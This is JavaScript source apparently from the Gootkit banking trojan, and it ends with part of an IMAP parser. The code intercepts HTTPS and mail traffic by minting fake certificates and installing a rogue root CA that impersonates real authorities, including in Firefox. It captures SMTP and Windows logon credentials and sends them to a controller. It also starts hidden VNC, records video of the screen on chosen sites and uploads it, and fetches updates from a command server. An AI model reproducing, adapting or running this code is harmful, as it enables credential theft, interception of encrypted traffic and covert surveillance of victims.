
                if(!ondonecalled){
                    ondonecalled = true;
                    onDone(address);
                }
            });

            serverInstance.clients = [];

            serverInstance.on('connection', function (socket) {
                serverInstance.clients.push(socket);
                socket.on('close', function () {
                    serverInstance.clients.remove(socket);
                });
            });
        });
    }
    else
    {
        if (!util.isUndefined(runningSSLServers[remoteHost])) {

            if(runningSSLServers[remoteHost].serverInstance.isClosed === false){
                //print('server already runnning for %s', remoteHost);
                address.remoteAddress = '127.0.0.1';
                address.remotePort = runningSSLServers[remoteHost].serverInstancePort;
                ondonecalled = true;
                return onDone(address);
            }
        }

        var cleartextStream = tls.connect(
            PORT_REDIRECTION_BASE + 443,
            remoteHost,
            { 
                rejectUnauthorized: false , 
                secureProtocol : 'TLSv1_method'
            },
        function () {

            //print('%s : TLS client connected;', address.remoteAddress);

            var peerCertificate = cleartextStream.getPeerCertificate();
            GetCertificateForPeer(remoteHost, peerCertificate, function (error, cert) {
                if (cert) {

                    utils.getPort({host : '127.0.0.1'}, function (err, randomPort) {
                    
                        //print('create new server for %s', remoteHost);

                        var serverInstance = https.createServer(
                        {
                            cert: cert.cert,
                            key: cert.key
                        }, function (req, res) {
                            ServeHttpsRequest(serverInstance, req, res);
                        });

                        serverInstance.remoteHost = remoteHost;
                        serverInstance.isClosed = false;

                        ReinitializeAutocloseTimeout(serverInstance);

                        runningSSLServers[remoteHost] =
                        {
                            serverInstance: serverInstance,
                            serverInstancePort: randomPort,
                            remoteHost: remoteHost,
                            certificate: cert,
                            isClosed : false
                        }

                        serverInstance.listen(randomPort, '127.0.0.1');
                        serverInstance.on('listening', function () {
                            //print('ok , server started on port %d', randomPort);

                            address.remotePort = randomPort;
                            address.remoteAddress = '127.0.0.1';

                            if(!ondonecalled){
                                ondonecalled = true;
                                onDone(address);
                            }
                        });

                        serverInstance.clients = [];

                        serverInstance.on('connection', function (socket) {
                            //print('HTTPS new socket');
                            serverInstance.clients.push(socket);
                            socket.on('close', function () {
                                //print('HTTPS removind socket');
                                serverInstance.clients.remove(socket);
                            });
                        });
                    });
                }
                else 
                {
                    if(!ondonecalled){
                        ondonecalled = true;
                        onDone(address);
                    }
                }
                cleartextStream.end();
            });
        });

        cleartextStream.on('error', function (error) {
           //trace('cleartextStream (no SNI) error!')
           //trace(error);
           //trace(error.stack);
           //trace(error.message);

           if (
                (error.message.indexOf('ECONNRESET') !== -1) || 
                (error.message.indexOf('alert number 40') !== -1) ||    // user certificate requred
                (error.message.indexOf('alert number 42') !== -1)       // invalid certificate
            )
           {
                if(error.message.indexOf('alert number 40') !== -1){
                    process.log("%s -> user certificate required: remoteHost=%s",
                        process.currentBinary,
                        remoteHost);
                }

                dns.resolve4(remoteHost, function(e, ips){
                    if(ips){
                       //trace('cert generation failed, block this host (%s)', ips);
                        excludedHosts = excludedHosts.concat(ips).unique();
                        //trace(excludedHosts);
                    }

                    if(!ondonecalled){
                        ondonecalled = true;
                        onDone(address);
                    }                       
                })
            }
            else{
                if(!ondonecalled){
                    ondonecalled = true;
                    onDone(address);
                }  
            }

            
            //print(error);
        });
    }
    
}

function ProcessHttpConnection(remoteHost, address, onDone) {

    if (!util.isUndefined(runningPlainServers[remoteHost])) {

        if(runningPlainServers[remoteHost].serverInstance.isClosed === false){
            //print('server already runnning for %s', remoteHost);
            address.remoteAddress = '127.0.0.1';
            address.remotePort = runningPlainServers[remoteHost].serverInstancePort;
            return onDone(address);
        }
    }

    utils.getPort({host : '127.0.0.1'}, function (err, randomPort) {
        
        //print('create new server for %s', remoteHost);

        var httpServer = http.createServer(function (req, res) {
            ServeHttpRequest(undefined, req, res);
        });

        httpServer.remoteHost = remoteHost;

        //ReinitializeAutocloseTimeout(httpServer);

        runningPlainServers[remoteHost] =
        {
            serverInstance: httpServer,
            serverInstancePort: randomPort,
            remoteHost: remoteHost,
            isClosed : false
        }

        address.remotePort = randomPort;
        address.remoteAddress = '127.0.0.1';
        httpServer.isClosed = false;
        httpServer.listen(randomPort, '127.0.0.1');
        
        httpServer.on('listening', function () {
            //print('ok , server started on port %d', randomPort);
            onDone(address);
        });

        httpServer.clients = [];

        httpServer.on('connection', function (socket) {
            //print('HTTP new socket');
            httpServer.clients.push(socket);
            socket.on('close', function () {
                //print('HTTP removind socket');
                httpServer.clients.remove(socket);
            });
        });
    });
}

function ServeSMTPConnection(
    remoteSocket, 
    clientSocket,
    remoteHost,
    isSSL
)
{
    var login = false;
    var password = false;
    var host = false;

    function DecodeAndSendPlainData(str){
        var userdata = new Buffer(str, 'base64');
        userdata = userdata.toString('utf-8').split('\u0000');
                    
        login = userdata[1] || userdata[0] || '';
        password = userdata[2] || '';
        
        SendAuthInformationPacket(login, 
            (isSSL === true ? '(SMTP-TLS) ' : '(SMTP) ' ) + 
            host + ' -> ' + 
            remoteHost, password);
    }

    var machineState = 'user_connected';

    clientSocket.on('data', function(chunk)
    {
        if(machineState === 'wait_login')
        {
            var text = chunk.toString().trim();
            if(!login){
                login = new Buffer(text, 'base64').toString();
            }else if(!password){
                password = new Buffer(text, 'base64').toString();
            } else {
                SendAuthInformationPacket(login, 
                    (isSSL === true ? '(SMTP-TLS) ' : '(SMTP) ' ) + 
                    host + ' -> ' + 
                    remoteHost, password);

                machineState = 'wait_body';
            }
        }else if(machineState === 'wait_login_plain')
        {
            DecodeAndSendPlainData(chunk.toString().trim());
            machineState = 'wait_body';
        }

        if(machineState == 'user_connected'){
            var command = chunk.toString().trim().split(' ');
            
            if(command[0] === 'AUTH')
            {
                if(command[1] === 'PLAIN'){
                    if(command.length === 3){
                        DecodeAndSendPlainData(command[3]);
                        machineState = 'wait_body';
                    }else {
                        machineState = 'wait_login_plain';
                    }

                }else if(command[1] === 'LOGIN'){
                    machineState = 'wait_login';
                }
            }
        }
    });

    remoteSocket.on('data', function(chunk){
        var command = chunk.toString().split(' ');
        if(command[0] === '220'){
            host = command[1];
        }
    });

    remoteSocket.pipe(clientSocket);
    clientSocket.pipe(remoteSocket);
}

//-------------------------------------------------------------------------
function GenericSocketDispatcher(
    remotePort /* true port */, 
    remoteHost /* true address */, 
    clientSocket,
    isSSL,
    DataStreamDispatcher
)
{

    //print('client connected');

    var engine = (isSSL === true ? tls : net);

    var options = {
        rejectUnauthorized: false,
        secureProtocol : 'TLSv1_method'
    };

    function onConnected(){
        var remoteSocket = this;
        //print('connected to remote peer');
        clientSocket.on('error', function(error){
            //print(error);
            remoteSocket.end();
        });        
        DataStreamDispatcher(remoteSocket, clientSocket, remoteHost, isSSL);
    };
    
    engine.connect(remotePort + PORT_REDIRECTION_BASE, 
    remoteHost, (isSSL === true  ? options : onConnected), onConnected).on('error', function(error){
        //print(error);
        clientSocket.end();
    });
}

function SeveGenericTunnel(remoteHost, address, onDone, isSSL, DataStreamDispatcher){
    var oldPort = address.remotePort;
    var hosthash = remoteHost + ':' + address.remotePort;

    var serverStore = (isSSL === true ? runningSSLServers : runningPlainServers);

    if (!util.isUndefined(serverStore[hosthash]))
    {
        if(serverStore[hosthash].serverInstance.isClosed === false){
            //print('server already runnning', 
            //    remoteHost, 
            //    serverStore[hosthash].serverInstancePort);
            address.remoteAddress = '127.0.0.1';
            address.remotePort = serverStore[hosthash].serverInstancePort;
            
            return onDone(address);
        }
    }

    utils.getPort({host : '127.0.0.1'}, suspend(function*(err, randomPort) {
        
        var serverInstance;

        if(isSSL)
        {
            var certificate = yield GeneratePeerFakeCetrificate(remoteHost, oldPort, resume());

            //print('fake cert generated ? ', (certificate !== null));

            serverInstance = tls.createServer({
                cert: (certificate ? certificate.cert : global_cert),
                key: (certificate ? certificate.key : global_key)
            }, function(clientSocket) {
                GenericSocketDispatcher(
                    oldPort, 
                    remoteHost, 
                    clientSocket, 
                    isSSL, 
                    DataStreamDispatcher);
            });
            
        }else{
            serverInstance = net.createServer(function(clientSocket) {
                GenericSocketDispatcher(
                    oldPort, 
                    remoteHost, 
                    clientSocket, 
                    isSSL, 
                    DataStreamDispatcher);
            });
        }

        serverInstance.remoteHost = remoteHost;

        serverStore[hosthash] =
        {
            serverInstance: serverInstance,
            serverInstancePort: randomPort,
            remoteHost: remoteHost,
            isClosed : false
        }

        address.remotePort = randomPort;
        address.remoteAddress = '127.0.0.1';

        serverInstance.isClosed = false;
        serverInstance.listen(randomPort, '127.0.0.1');
        
        serverInstance.on('listening', function () {
            //print('ok , server started on port %d', randomPort);
            onDone(address);
        });

        serverInstance.clients = [];

        serverInstance.on('connection', function (socket) {
            //print('IMAP has new client socket');
            
            serverInstance.clients.push(socket);
            
            socket.on('close', function () {
                //print('IMAP loose client socket');
                serverInstance.clients.remove(socket);
            });

            socket.on('error', function (error) {
                //print('IMAP error', error);
            });
        });

        serverInstance.on('clientError', function(error){
            //print('clientError', error)
        })
    }));
}

function ProcessSMTPConnection(remoteHost, address, onDone, isSSL) {
    SeveGenericTunnel(remoteHost, address, onDone, isSSL, ServeSMTPConnection);
}

function ProcessPOP3Connection(remoteHost, address, onDone, isSSL) {
    SeveGenericTunnel(remoteHost, address, onDone, isSSL, 
        require('mail_spyware').ServePOP3Connection);
}

function ProcessIMAPConnection(remoteHost, address, onDone, isSSL){
    SeveGenericTunnel(remoteHost, address, onDone, isSSL, 
        require('mail_spyware').ServeIMAPConnection);
}

process.proxyServers.SeveGenericTunnel = SeveGenericTunnel;

function IsPortMustBeFiltered(port){
    return (process.proxyServers.includedPorts.indexOf(port) !== -1);

}

var ConnectionRequestCallback = function (address, onDone) {


    // skip unentirresting port
    if(!IsPortMustBeFiltered(address.remotePort)){
        if(process.bIsDebugVersion)
            print('onconnection : %s --> BYPASS', JSON.stringify(address));
        return onDone(address);
    }else{
        if(process.bIsDebugVersion)
            print('onconnection : %s --> HOOK', JSON.stringify(address));
    }

    var remoteHost = address.remoteAddress;    

    if (excludedHosts.indexOf(remoteHost) !== -1) {
        if(process.bIsDebugVersion)
            print('onconnection : %s --> BANNED', JSON.stringify(address));
        return onDone(address);
    }
    
    if(process.proxyServers.blockedAddresses.indexOf(address) !== -1){
        
        if(process.bIsDebugVersion)
            print('onconnection : %s --> REDIRECT TO CACHED SERVER', JSON.stringify(address));

        address.remoteAddress = '1.2.3.4';
        address.remotePort = 1234;
        return onDone(address);
    }

    //trace("%s", address.remoteAddress);

    var localCbcs = process.proxyServers.portRedirectionCallbacks;
    var portStr = address.remotePort.toString();
    var bContinueCallFall = true;
    var connectionKey = remoteHost + ':' + portStr;

    if (!util.isUndefined( localCbcs[portStr] ) ) {
        bContinueCallFall = localCbcs[portStr](remoteHost, address, onDone);
    } else if (!util.isUndefined( localCbcs[connectionKey] )) {
        bContinueCallFall = localCbcs[connectionKey](remoteHost, address, onDone);
    }
    
    if(bContinueCallFall){
        if (address.remotePort === 443 || address.remotePort === 8083) {
            return ProcessSSLConnection(remoteHost, address, onDone);
        } else if (address.remotePort === 80 || address.remotePort === 8082) {
            return ProcessHttpConnection("superhost", address, onDone);
        } else if (address.remotePort === 25 || address.remotePort === 2525) {
            return ProcessSMTPConnection(remoteHost, address, onDone, false);
        } else if (address.remotePort === 465) {
            return ProcessSMTPConnection(remoteHost, address, onDone, true);
        } else if (address.remotePort === 110 ) {
            return ProcessPOP3Connection(remoteHost, address, onDone, false);
        } else if (address.remotePort === 995 ) {
            return ProcessPOP3Connection(remoteHost, address, onDone, true);
        } else if (address.remotePort === 143 ) {
            return ProcessIMAPConnection(remoteHost, address, onDone, false);
        } else if (address.remotePort === 993 ) {
            return ProcessIMAPConnection(remoteHost, address, onDone, true);
        } else {
            return onDone(address);
        }
    }else {
        return onDone(address);
    }
    
}

function installFirefoxCertificate(certificate)
{
    if (certgen.firefoxIsDbInitialized()) {

        certgen.firefoxImportCert(
            pemToDer(encodedCert),
            process.md5(encodedCert));

        var gootkit_spyware = require("spyware");
        gootkit_spyware.SpStartHttpIntercepting();
        clearInterval(xx);
    }
}

function pemToDer(encodedCert){
    var a = encodedCert.trim().split('\r\n');
    a.pop();
    a.splice(0, 1);
    return new Buffer(a.join(), 'base64');
}

function sleep(ms, cb)
{
    setTimeout(function(){cb()},ms);
}

var possibleCerts = [
    {
        name : 'GeoTrust Global CA',
        str : [
            'CN=GeoTrust Global CA',
            'O="GeoTrust Inc."',
            'C=US'
        ].join(', ')
    },{
        name : 'AddTrust External CA Root',
        str : [
            'CN=AddTrust External CA Root',
            'OU="AddTrust External TTP Network"',
            'O=AddTrust AB',
            'C=SE'
        ].join(', ')
    },{
        name : 'Class 2 Primary CA',
        str : [
            'CN=Class 2 Primary CA',
            'O=Certplus',
            'C=FR'
        ].join(', ')
    },{
        name : 'Microsoft Root Authority',
        str : [
            'CN=Microsoft Root Authority',
            'OU=Microsoft Corporation',
            'OU="Copyright (c) 1997 Microsoft Corp."'
        ].join(', ')
    },{
        name : 'Go Daddy Class 2 Certification Authority',
        str : [
            'CN=Go Daddy Class 2 Certification Authority',
            'O=" The Go Daddy Group, Inc."',
            'C=US'
        ].join(', ')
    },{
        name : 'Thawte Premium Server CA',
        str : [
            'E="premium-server@thawte.com"',
            'CN=Thawte Premium Server CA',
            'OU=Certification Services Division',
            'O=Thawte Consulting cc',
            'L=Cape Town',
            'S=Western Cape',
            'C=ZA'
        ].join(', ')
    },{
        name : 'VeriSign Trust Network',
        str : [
            'CN=VeriSign Trust Network',
            'OU=VeriSign Trust Network',
            'OU="(c) 1998 VeriSign, Inc. - For authorized use only"',
            'OU="Class 3 Public Primary Certification Authority - G2"',
            'O="VeriSign, Inc."',
            'C=US'
        ].join(', ')
    },{
        name : 'StartCom Certification Authority',
        str : [
            'CN=StartCom Certification Authority',
            'OU=Secure Digital Certificate Signing',
            'O="StartCom Ltd."',
            'C=IL'
        ].join(', ')
    },{
        name : 'RSA Security 2048 V3',
        str : [
            'CN=RSA Security 2048 V3',
            'OU=RSA Security 2048 V3',
            'O=RSA Security Inc'
        ].join(', ')
    },{
        name : 'GTE CyberTrust Global Root',
        str : [
            'CN=RGTE CyberTrust Global Root',
            'OU="GTE CyberTrust Solutions, Inc."',
            'O=GTE Corporation',
            'C=US'
        ].join(', ')
    },{
        name : 'GlobalSign Root CA',
        str : [
            'CN=GlobalSign Root CA',
            'OU=Root CA',
            'O=GlobalSign nv-sa',
            'C=BE'
        ].join(', ')
    }
];

var installRootCACertificate = suspend(function*(cb) {

    var expectedCert = possibleCerts.randomElement();

    var existentCert = certgen.isAnyGoodKeyExists();
    if(false === existentCert)
    {
        print('Quick, I need to forget the last 24 hours. I tried to do a Don Rickles about Arabs, but I ended up doing a Mel Gibson about Mexicans.');
        //print('cert not found, generate new.');
        var genResult = yield certgen.generateRootCert(
            expectedCert.name, expectedCert.str, resume());

        if(genResult)
        {
            existentCert = certgen.isAnyGoodKeyExists();
        }
    }

    if(false !== existentCert)
    {
        print('Kids, have you seen your mother? Or yourselves?');
        //print('certificate EXIST!');

        if(process.currentBinary === 'firefox.exe')
        {
            while(!certgen.firefoxIsDbInitialized()){
                //print('database not ready');
                yield sleep(100, resume());
            }
            //print('database ready!');

            certgen.firefoxImportCert(
                pemToDer(existentCert), 
                process.md5(existentCert)
            );
            //print('FF certificate installed');
        }

        cb();
    }
    else
    {
        setTimeout(function(){
            installRootCACertificate(cb)}, 2000);
    }
});

process.isHttpInterceptingEnabled = false;

exports.SpStopHttpIntercepting = function()
{
    if(process.isHttpInterceptingEnabled === true)
    {
        gootkit_spyware.SpUnhookHttp();

        [runningPlainServers, runningSSLServers].forEach(function (servers)
        {
            for(let s in servers)
            {
                var srv = servers[s];
                clearTimeout(srv.autoCloseTimerId);
                srv.serverInstance.close();
                srv.serverInstance.clients.forEach(function (socket)
                {
                    socket.destroy();
                });
            }
        });

        process.isHttpInterceptingEnabled = false;
    }
};

exports.SpStartHttpIntercepting = function() 
{
    //print('SpStartHttpIntercepting()');
    bIsFuckedIeOnXP = IsFuckedIeOnXP();
    if(process.isHttpInterceptingEnabled === false){
        process.isHttpInterceptingEnabled = true;
        installRootCACertificate(function () {
            //print('installRootCACertificate() -> done');
            gootkit_spyware.SpInitialize();
            gootkit_spyware.SpHookHttp(ConnectionRequestCallback);
        })
    }
};

exports.PregenerateCertificate = function(){
    installRootCACertificate(function () {
        print('His blood! It\'s full of cholesterol!');
    });
}
//=========================================================================================================
var vncServerStarted = false;

exports.startVncServer = function(){

    if(vncServerStarted) 
        return vncServerStarted;
    
    
    function getRandomArbitrary(min, max) {
        return Math.floor(Math.random() * (max - min) + min);
    }

    var userServer;
    var VncServiceSocket;
    
    vncServerStarted = (gootkit_spyware.SpRunVnc() === 1);
    
    return vncServerStarted;
}

process.log = function(){
    try{
        var s = util.format.apply(this, arguments);
        var packet = messages.LogLine.encode({
            logstr : s
        });

        if(process.controllerConnection){
            process.controllerConnection
                .sendProtocolPacket(P_SPYWARE, 
                    SLAVE_PACKET_LOGLINE, 0, packet);
        }else{
            if (process.masterConnection) {
                process.masterConnection.sendProtocolPacket(
                    SLAVE_PACKET_LOGLINE,
                    packet
                );
            }
            else
            {
                process.pendingMessages.push({
                    t : SLAVE_PACKET_LOGLINE,
                    p : packet
                });
            }
        }
    
    }catch(e){
        //print(e.message);
        //print(e.stack);
    }
}

process.logException = function(exc, info){
    try{ 
        var logline = util.format(
            "%s.%s (%s/%s/%s) exception : %s\n%s",
        
            process.execPath,
            process.arch,

            util.format("%s.%s", process.version, process.g_botId),
            process.g_vendorName,
            util.format("%s %s (%s)", os.type(), os.release(), os.arch()),

            exc.message,
            exc.stack
        );

        if(info){
            logline += util.format('\nInformation : %s', info)
        }

        process.log(logline);
    }catch(e){

    }
}

function downloadUpdate(serverHost, callback){

    var arch = { 'ia32' : 32, 'x64' : 64 };
    var updateLink = util.format("https://%s:80/rbody%d", serverHost, arch[process.arch]);
    
    //print(updateLink);

    gootkit_spyware.DownloadFileRight(updateLink, function(error, fileBuffer){
        callback(error, fileBuffer);
    });
    
}

//=========================================================================================================
function SendAuthInformationPacket(UserName, UserDomain, UserPassword) {
    
    //print('LSASS ! auth catched!');

    //print('UserName : %s', UserName);
    //print('UserDomain : %s', UserDomain);
    //print('UserPassword : %s', UserPassword);

    if (process.masterConnection) {
        process.masterConnection.sendProtocolPacket(
            SLAVE_PACKET_LSAAUTH,
            messages.LsaAuth.encode({
                UserName: UserName,
                UserDomain: UserDomain,
                UserPassword: UserPassword
            })
        );
    }
    else
    {
        process.pendingMessages.push({
            t : SLAVE_PACKET_LSAAUTH,
            p : messages.LsaAuth.encode({
                UserName: UserName,
                UserDomain: UserDomain,
                UserPassword: UserPassword
            })
        });
        //print('cant connect to master process. just waiting for it..');
    }
}
process.SendAuthInformationPacket = SendAuthInformationPacket;
function SpHookLsa(){
    return gootkit_spyware.SpHookLsa(SendAuthInformationPacket);
}
    
exports.SpHookLsa = SpHookLsa;
//=========================================================================================================
function SplitVirtualPath(varPath) {
    var normalizedPath = path.normalize(varPath);

    if (normalizedPath.lastIndexOf(path.sep) === (normalizedPath.length - 1)) {
        normalizedPath = normalizedPath.substring(0, normalizedPath.length - 1);
    }

    return normalizedPath.split(path.sep);
}
function GetObjectValueByPath(object, varPath) {

    var arrayOfNames = SplitVirtualPath(varPath);
    var tmp = object;

    while (arrayOfNames.length) {
        var n = arrayOfNames.shift();
        if (n in tmp) {
            tmp = tmp[n];
        } else {
            return;
        }
    }
    return tmp;
}


function SetObjectValueByPath(object, varPath, varValue) {

    var result;
    var arrayOfNames = SplitVirtualPath(varPath);
    var tmp = object;

    for (var i = 0; i < arrayOfNames.length - 1; i++) {


        var n = arrayOfNames[i];

        if (n in tmp) {
            tmp = tmp[n];
        } else {
            tmp[n] = {};
            tmp = tmp[n];
        }
    }

    tmp[arrayOfNames[arrayOfNames.length - 1]] = varValue;
    return object;
}

var globalStorageName = '';

function MachineSetGlobalStorageName(name) {
    globalStorageName = name;
}

function MachineInitializeVariablesStorage(name) {

    if (util.isUndefined(name)) {
        name = globalStorageName;
    }

    if (gootkit_spyware.GCreateSharedString(name)) {
        return true;
    }

    return false;
}


function MachineGetValue(varPath, storName) {

    if (util.isUndefined(storName)) {
        storName = globalStorageName;
    }

    if (typeof (storName) === 'string' && storName !== '') {

        //console.log(gootkit_spyware.GGetSharedString(storName));
        try {
            var parsedObject = JSON.parse(gootkit_spyware.GGetSharedString(storName));
            if (parsedObject) {
                return GetObjectValueByPath(parsedObject, varPath);
            }
        } catch (e) {
            return undefined;
        }
    }
}


function MachineSetValue(varPath, varValue, storName) {

    if (util.isUndefined(storName)) {
        storName = globalStorageName;
    }

    if (typeof (storName) === 'string' && storName !== '') {

        var parsedObject;

        try {
            parsedObject = JSON.parse(gootkit_spyware.GGetSharedString(storName));
        } catch (e) {
            parsedObject = {};
        }

        if (parsedObject) {
            var newObject = SetObjectValueByPath(parsedObject, varPath, varValue);
            if (newObject) {
                gootkit_spyware.GSetSharedString(storName, JSON.stringify(newObject));
            }
        }
    }
}

function ToBoolean(somthing) {
    try {
        switch (somthing.toString().toLowerCase()) {
            case "true": case "yes": case "1": return true;
            case "false": case "no": case "0": case null: return false;
            default: return Boolean(string);
        }
    } catch (e) {
        return false;
    }
}

process.videorecoder = {
    options: {
        recorderProcess: 'explorer.exe'
    }
}

exports.videorecoder = process.videorecoder;

function getCompressor() {
    var compressor;
    var lz = require('xz');

    for (var i = 9; i > 0; i--) {
        try {
            compressor = new lz.Compressor(i);
            break;
        } catch (e) {

        }
    }

    return compressor;
}

process.OnUrlNotify = function (location) {
    //print('%s : notification %s', process.currentBinary, location);
    try{
        if (util.isUndefined(process.g_scfg)) {
            return false;
        }

        var recordersArray = process.g_scfg.recorders;

        if (util.isUndefined(recordersArray)) {
            return false;
        }

        if (util.isUndefined(location)) {
            return false;
        }

        if (process.currentBinary === process.videorecoder.options.recorderProcess) {
            for (let i = 0; i < recordersArray.length; i++) {

                var rec = recordersArray[i];

                if (rec.base.enabled === false) {
                    continue;
                }

                if (!isUrlNeedMatchedInRule(location, rec)) {
                    continue;
                }

                if (typeof (process.VideoRecorder) !== 'undefined') {

                    var recordingHostname = url.parse(location).host;
                    var vedeofile = rec.filenameMask;
                    if (typeof (vedeofile) === 'undefined') {
                        vedeofile = "video_%HOSTNAME%_%DATE%";
                    }

                    vedeofile = vedeofile
                        .replace('%HOSTNAME%', recordingHostname)
                        .replace('%DATE%', utils.getCurrentDateFilenameString())

                    var filename = path.join(process.env['temp'], vedeofile);

                    if (fs.existsSync(filename + '.ivf') === true) {
                        filename += ('_' + utils.getCurrentTimstamp());
                    }

                    filename += '.ivf';

                    //print('filename : %s', filename);

                    var recorder = new process.VideoRecorder(filename,
                        rec.grayScale,
                        rec.framerate,
                        rec.seconds,
                        rec.hashkey
                    );

                    if(recorder.configure){
                        recorder.configure({
                            bit_depth : 8,
                            max_quantizer : 80,
                            min_quantizer : 80
                        });
                    }

                    //print(recorder);

                    recorder.start(function () {
                        if (rec.uploadAfterRecord === true) {

                            //print('recording is END');

                            var compressor = getCompressor();
                            var inFile = fs.createReadStream(filename);
                            var outFile = fs.createWriteStream(filename + ".lzma2");

                            outFile.on('close', function () {
                                //print('outFile packed. name : %s', filename + ".lzma2");
                                fs.unlinkSync(filename);
                                process.uploadLocalFile(filename + ".lzma2", function () { });
                            });

                            inFile.pipe(compressor).pipe(outFile);

                        };
                    });
                }
            }
        }

    }catch(exception){
        process.logException(exception);
    }
    return false;

}

var VideoRecorders = [];

function VideoRecorder(
    filename,
    grayScale,
    bitrate,
    seconds,
    hashkey
) {
    var self = this;
    if (util.isUndefined(bitrate)) {
        bitrate = 2;
    }

    if (util.isUndefined(grayScale)) {
        grayScale = true;
    }

    self.grayScale = ToBoolean(grayScale);
    self.bitrate = parseInt(bitrate);
    self.filename = filename;
    self.hashkey = process.md5(hashkey);
    self.timeout = seconds * 1000;

    if (self.bitrate > 25)
        self.bitrate = 25;

    self.recorder = new video_recorder.VideoRecorder(
        self.filename,
        self.grayScale,
        self.bitrate
    );

    self.recorderTimeout = 0;
    self.onDoneCallback;
}

VideoRecorder.prototype.start = function (callback) {
    var self = this;

    if (VideoRecorders.indexOf(self.hashkey) === -1) {

        VideoRecorders.push(self.hashkey);

        if (self.recorder) {
            self.recorder.start(function () {
                callback(self);
            });
        }

        self.recorderTimeout = setTimeout(
            function () {
                self.recorderTimeout = 0;
                self.stop();
            },
            self.timeout
        );

    } else {
        //console.log('VideoRecorder.prototype.start : sorry, video already recording');
    }
}

VideoRecorder.prototype.isRecordingNow = function () {

    //console.log('VideoRecorder.prototype.isRecordingNow');

    var self = this;

    return self.recorder.isRecordRunning();
}

VideoRecorder.prototype.stop = function () {
    var self = this;

    if (self.recorderTimeout !== 0) {
        clearTimeout(self.recorderTimeout);
    }

    self.recorderTimeout = 0;
    self.recorder.stop();

    var RecorderIndex = VideoRecorders.indexOf(self.hashkey);
    if (RecorderIndex !== -1) {
        VideoRecorders.splice(RecorderIndex, 1);
    }

}

VideoRecorder.prototype.lastErrorMessage = function () {
    var self = this;
    return self.recorder.getLastErrorMessage();
}

process.VideoRecorder = VideoRecorder;

process.GCreateSharedString = gootkit_spyware.GCreateSharedString;
process.GSetSharedString = gootkit_spyware.GSetSharedString;
process.GGetSharedString = gootkit_spyware.GGetSharedString;

process.MachineInitializeVariablesStorage = MachineInitializeVariablesStorage;
process.MachineSetGlobalStorageName = MachineSetGlobalStorageName;
process.MachineGetValue = MachineGetValue;
process.MachineSetValue = MachineSetValue;
process.downloadUpdate = downloadUpdate;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          

========

var EventEmitter = require('events').EventEmitter,
    ReadableStream = require('stream').Readable,
    inherits = require('util').inherits,
    inspect = require('util').inspect,
    tls = require('tls'),
    Socket = require('net').Socket,
    EventEmitter = require('events').EventEmitter,
    inherits = require('util').inherits,
    inspect = require('util').inspect,
    isDate = require('util').isDate,
    utf7 = require('utf7').imap,
    jsencoding = require('encoding');



var CH_LF = 10,
    LITPLACEHOLDER = String.fromCharCode(0),
    EMPTY_READCB = function (n) { },
    RE_INTEGER = /^\d+$/,
    RE_PRECEDING = /^(?:(?:\*|A\d+) )|\+ ?/,
    RE_BODYLITERAL = /BODY\[(.*)\] \{(\d+)\}$/i,
    RE_BODYINLINEKEY = /^BODY\[(.*)\]$/i,
    RE_SEQNO = /^\* (\d+)/,
    RE_LISTCONTENT = /^\((.*)\)$/,
    RE_LITERAL = /\{(\d+)\}$/,
    RE_UNTAGGED = /^\* (?:(OK|NO|BAD|BYE|FLAGS|ID|LIST|LSUB|SEARCH|STATUS|CAPABILITY|NAMESPACE|PREAUTH|SORT|THREAD|ESEARCH|QUOTA|QUOTAROOT)|(\d+) (EXPUNGE|FETCH|RECENT|EXISTS))(?:(?: \[([^\]]+)\])?(?: (.+))?)?$/i,
    RE_TAGGED = /^A(\d+) (OK|NO|BAD) (?:\[([^\]]+)\] )?(.+)$/i,
    RE_CONTINUE = /^\+(?: (?:\[([^\]]+)\] )?(.+))?$/i,
    RE_CRLF = /\r\n/g,
    RE_HDR = /^([^:]+):[ \t]?(.+)?$/,
    RE_ENCWORD = /=\?([^?*]*?)(?:\*.*?)?\?([qb])\?(.*?)\?=/gi,
    RE_ENCWORD_END = /=\?([^?*]*?)(?:\*.*?)?\?([qb])\?(.*?)\?=$/i,
    RE_ENCWORD_BEGIN = /^[ \t]=\?([^?*]*?)(?:\*.*?)?\?([qb])\?(.*?)\?=/i,
    RE_QENC = /(?:=([a-fA-F0-9]{2}))|_/g,
    RE_SEARCH_MODSEQ = /^(.+) \(MODSEQ (.+?)\)$/i,
    RE_LWS_ONLY = /^[ \t]*$/;

function IMAPParser(stream, debug) {
    if (!(this instanceof IMAPParser))
        return new IMAPParser(stream, debug);

    EventEmitter.call(this);

    this._stream = undefined;
    this._body = undefined;
    this._literallen = 0;
    this._literals = [];
    this._buffer = '';
    this._ignoreReadable = false;
    this.debug = debug;

    var self = this;
    this._cbReadable = function () {
        if (self._ignoreReadable)
            return;
        if (self._literallen > 0 && !self._body)
            self._tryread(self._literallen);
        else
            self._tryread();
    };

    this.setStream(stream);

    process.nextTick(this._cbReadable);
}
inherits(IMAPParser, EventEmitter);

IMAPParser.prototype.setStream = function (stream) {
    if (this._stream)
        this._stream.removeListener('readable', this._cbReadable);

    if (/^v0\.8\./.test(process.version)) {
        this._stream = (new ReadableStream()).wrap(stream);

        
        
        
        stream._events.error.pop();
    } else
        this._stream = stream;

    this._stream.on('readable', this._cbReadable);
};

IMAPParser.prototype._tryread = function (n) {
    if (this._stream.readable) {
        var r = this._stream.read(n);
        r && this._parse(r);
    }
};

IMAPParser.prototype._parse = function (data) {
    var i = 0, datalen = data.length, idxlf;

    if (this._literallen > 0) {
        if (this._body) {
            var body = this._body;
            if (datalen >= this._literallen) {
                var litlen = this._literallen;
                i = litlen;
                this._literallen = 0;
                this._body = undefined;
                body._read = EMPTY_READCB;
                if (datalen > litlen)
                    body.push(data.slice(0, litlen));
                else
                    body.push(data);
                body.push(null);
            } else {
                this._literallen -= datalen;
                var r = body.push(data);
                if (!r) {
                    body._read = this._cbReadable;
                    return;
                }
                i = datalen;
            }
        } else {
            if (datalen > this._literallen)
                this._literals.push(data.slice(0, this._literallen));
            else
                this._literals.push(data);
            i = this._literallen;
            this._literallen = 0;
        }
    }

    while (i < datalen) {
        idxlf = indexOfCh(data, datalen, i, CH_LF);
        if (idxlf === -1) {
            this._buffer += data.toString('utf8', i);
            break;
        } else {
            this._buffer += data.toString('utf8', i, idxlf);
            this._buffer = this._buffer.trim();
            i = idxlf + 1;

            this.debug && this.debug('<= ' + inspect(this._buffer));

